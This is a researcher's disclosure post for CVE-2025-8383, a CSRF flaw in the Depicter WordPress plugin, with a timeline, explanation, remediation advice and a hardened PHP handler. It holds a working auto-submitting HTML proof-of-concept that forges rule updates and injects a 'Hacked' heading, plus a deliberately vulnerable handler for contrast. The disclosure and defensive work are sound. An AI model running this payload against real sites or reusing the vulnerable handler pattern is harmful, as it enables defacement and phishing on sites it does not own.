Depicter is a popular WordPress slider and content presentation plugin with 100k+ active installations. It allows administrators and editors to create dynamic documents (sliders, popups, content blocks) and define display rules that control where and how content is shown. During testing, we discovered CVE-2025-8383, a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to force a logged-in user’s browser to execute the AJAX action depicter-document-rules-store. The attack is delivered by an unauthenticated attacker via a crafted HTML page, causing unauthorized rule updates (including injection of attacker-controlled HTML into rule titles/content) without explicit user intent.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-8383 |
| Plugin Version | Depicter <= 4.0.4 |
| Severity | High |
| All-time downloads | 1 926 955 |
| Active installations | 100 000+ |
| Publicly Published | October 30, 2025 |
| Last Updated | October 31, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8383 , https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/depicter/depicter-404-cross-site-request-forgery |
Timeline
| Date | Event |
| --- | --- |
| July 18, 2025 | Plugin testing and vulnerability detection in Depicter — Popup & Slider Builder was completed |
| July 18, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 30, 2025 | Registered CVE-2025-8383 |
Discovery of the Vulnerability
The vulnerability exists because the AJAX endpoint behind admin-ajax.php accepts POST requests containing action=depicter-document-rules-store and does not enforce proper CSRF protection (e.g., missing check_ajax_referer() / nonce verification). As a result, if a privileged user (Admin/Editor) is logged into WordPress and visits an attacker-controlled page, their browser automatically submits a POST request that updates the document’s rules. Since the request changes plugin state and stores attacker-controlled JSON content, this issue constitutes a CSRF-driven unauthorized configuration update.
Understanding CSRF attacks
CSRF vulnerabilities occur when a web application performs state-changing actions based solely on the user’s authenticated session cookies, without verifying a request-specific anti-CSRF token. WordPress best practices require both a capability check (authorization) and a nonce check (CSRF protection). Many real-world plugin CVEs have resulted from missing nonce validation on AJAX handlers, enabling attackers to silently change plugin settings, create content, or modify published output. In Depicter’s case, the endpoint writes user-controlled data to rule configuration, which can be leveraged for defacement, content injection, and potentially chained attacks if the stored values are later rendered unsafely elsewhere in the admin or frontend.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-8383, an attacker needs no session of their own: they host a page such as the one below, and when a logged-in administrator or editor visits it, the victim's browser submits the form to admin-ajax.php with the victim's cookies attached.
POC:
```html
<html>
  <body>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="depicter-document-rules-store" />
      <input type="hidden" name="ID" value="1" />
      <!-- the JSON contains double quotes, so the attribute must be single-quoted
           or the value would end at the first inner quote -->
      <input type="hidden" name="content" value='{"rules":[{"title":"<h1>Hacked</h1>","conditions":[]}]}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
The risk depends on how Depicter renders and applies stored rule content, but even in the most conservative case, this enables unauthorized modifications to display logic and document configuration. Real-world outcomes include:
- Defacement: Attackers inject visual changes (e.g., “Hacked” banners) that appear on pages where the document is displayed.
- Content manipulation: Rules can be altered to show popups/sliders on sensitive pages (checkout, login, support).
- Phishing enablement: Attackers can force display of deceptive UI elements or overlays to collect user data.
- Operational disruption: Rules can be cleared or modified to break legitimate site functionality and marketing flows.
In multi-admin environments, simply getting one privileged user to visit a malicious link is enough to cause persistent changes.
Recommendations for Improved Security
Add CSRF protection: The handler must require and validate a nonce using check_ajax_referer() before any write operation.
Strict capability checks: Ensure only authorized roles can call depicter-document-rules-store, e.g., current_user_can('manage_options') or a plugin-specific capability.
Use POST + same-origin enforcement: Explicitly require POST, validate Origin/Referer, and reject cross-site requests where feasible.
Sanitize stored content: Treat rule titles and other user-controlled fields as untrusted; apply sanitization (wp_kses_post) and safe output escaping (esc_html, esc_attr) on render.
Audit other AJAX routes: Review all admin-ajax.php actions for nonce/capability enforcement to prevent related CSRF surfaces.
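The following is an added illustration written for this post, not Depicter's own code. It shows the shape of an admin-ajax handler for depicter-document-rules-store that relies on the session cookie alone (the pattern the CSRF section above describes), and beside it a hardened version that applies the five recommendations: nonce verification, a capability check, POST and Origin enforcement, input validation, and sanitization of the stored rule titles. The nonce action name, the post-meta key `_depicter_rules`, the script handle `depicter-admin`, the `manage_options` capability and the storage layout are assumptions for the example; the real plugin may store and gate rules differently.

```php
<?php
/**
 * Added example (not Depicter's code): vulnerable vs hardened admin-ajax handler
 * for action=depicter-document-rules-store. Meta key, nonce action and script
 * handle are assumed names; adjust to the plugin's real ones.
 */

// --- Vulnerable shape: the only "proof" the user meant this is the session cookie,
//     which the browser attaches to a cross-site form POST automatically.
function depicter_rules_store_vulnerable() {
    $id      = absint( $_POST['ID'] ?? 0 );
    $content = wp_unslash( $_POST['content'] ?? '' );
    update_post_meta( $id, '_depicter_rules', $content ); // raw attacker JSON, no nonce, no capability
    wp_send_json_success();
}

// --- Hardened shape.
function depicter_rules_store_hardened() {
    // 1. CSRF: dies with HTTP 403 unless $_POST['nonce'] is a valid nonce for this action.
    //    The client must obtain it from wp_create_nonce( 'depicter-document-rules-store' ).
    check_ajax_referer( 'depicter-document-rules-store', 'nonce' );

    // 2. Authorization: the nonce proves intent, the capability proves the right to act.
    //    Replace manage_options with the plugin's own capability if editors must be allowed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient capability' ), 403 );
    }

    // 3. Defence in depth: require POST, and when the browser sends an Origin header,
    //    require it to match this site (is_allowed_http_origin() compares against home/site/admin URLs).
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        wp_send_json_error( array( 'message' => 'POST required' ), 405 );
    }
    if ( get_http_origin() && ! is_allowed_http_origin() ) {
        wp_send_json_error( array( 'message' => 'cross-site origin rejected' ), 403 );
    }

    // 4. Validate the document ID: it must refer to an existing post.
    $id = absint( $_POST['ID'] ?? 0 );
    if ( ! $id || ! get_post( $id ) ) {
        wp_send_json_error( array( 'message' => 'unknown document' ), 400 );
    }

    // 5. Parse the JSON instead of storing the raw string, and reject unexpected shapes.
    $decoded = json_decode( wp_unslash( $_POST['content'] ?? '' ), true );
    if ( ! is_array( $decoded ) || ! isset( $decoded['rules'] ) || ! is_array( $decoded['rules'] ) ) {
        wp_send_json_error( array( 'message' => 'malformed rules' ), 400 );
    }

    $rules = array();
    foreach ( $decoded['rules'] as $rule ) {
        if ( ! is_array( $rule ) ) {
            continue;
        }
        $rules[] = array(
            // Title is untrusted. wp_kses_post() keeps post-author markup such as <h1>
            // but strips <script>, on* handlers and javascript: URLs; use
            // sanitize_text_field() instead if titles never need markup.
            'title'      => wp_kses_post( (string) ( $rule['title'] ?? '' ) ),
            // Conditions are walked recursively so every leaf string is sanitized.
            'conditions' => isset( $rule['conditions'] ) && is_array( $rule['conditions'] )
                ? map_deep( $rule['conditions'], 'sanitize_text_field' )
                : array(),
        );
    }

    update_post_meta( $id, '_depicter_rules', $rules ); // assumed meta key
    wp_send_json_success( array( 'ID' => $id, 'rules' => $rules ) );
}
add_action( 'wp_ajax_depicter-document-rules-store', 'depicter_rules_store_hardened' );

// Page side: hand the nonce to the logged-in client's script. A cross-site page
// cannot read this value, so the forged POST in the PoC above fails at step 1.
function depicter_rules_store_localize() {
    wp_localize_script( 'depicter-admin', 'depicterRules', array( // assumed script handle
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'depicter-document-rules-store' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'depicter_rules_store_localize' );
```

With the hardened handler registered, replaying the PoC form yields a 403 from check_ajax_referer() before any of the later checks run, because the attacker's page has no way to include the victim's nonce. When rendering the stored titles, still escape at output time (esc_html() for text contexts, esc_attr() inside attributes); sanitizing on input does not remove the need for that.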
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8383, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.
